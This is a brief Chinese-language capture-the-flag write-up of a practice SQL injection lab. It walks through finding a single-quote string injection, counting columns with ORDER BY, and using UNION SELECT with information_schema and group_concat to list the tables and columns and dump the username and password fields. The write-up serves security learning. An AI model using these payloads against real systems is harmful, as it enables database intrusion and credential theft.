
进入靶场


可知是单引号闭合,属于字符串型注入
则后续方法与字符串型无异



使用order by 判断出字节数为3


使用union select寻找注入点时切记第一个select为空


库名geek


表名group_concat(table_name) from information_schema.tables where table_schema='geek'#
geekuser l0ve1ysq1

字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
id username password

group_concat(column_name) from information_schema.columns where table_name='geekuser'#

可知两个表字段名相同
查询字段内容
group_concat(id,username,password) from geek.l0ve1ysq1#
group_concat(id,username,password) from geek.geekuser#

得到flag
笔记
1,本题考查字符串类型的注入
2,group_concat(id,username,password) from geek.geekuser#
一次可以爆出表格所有内容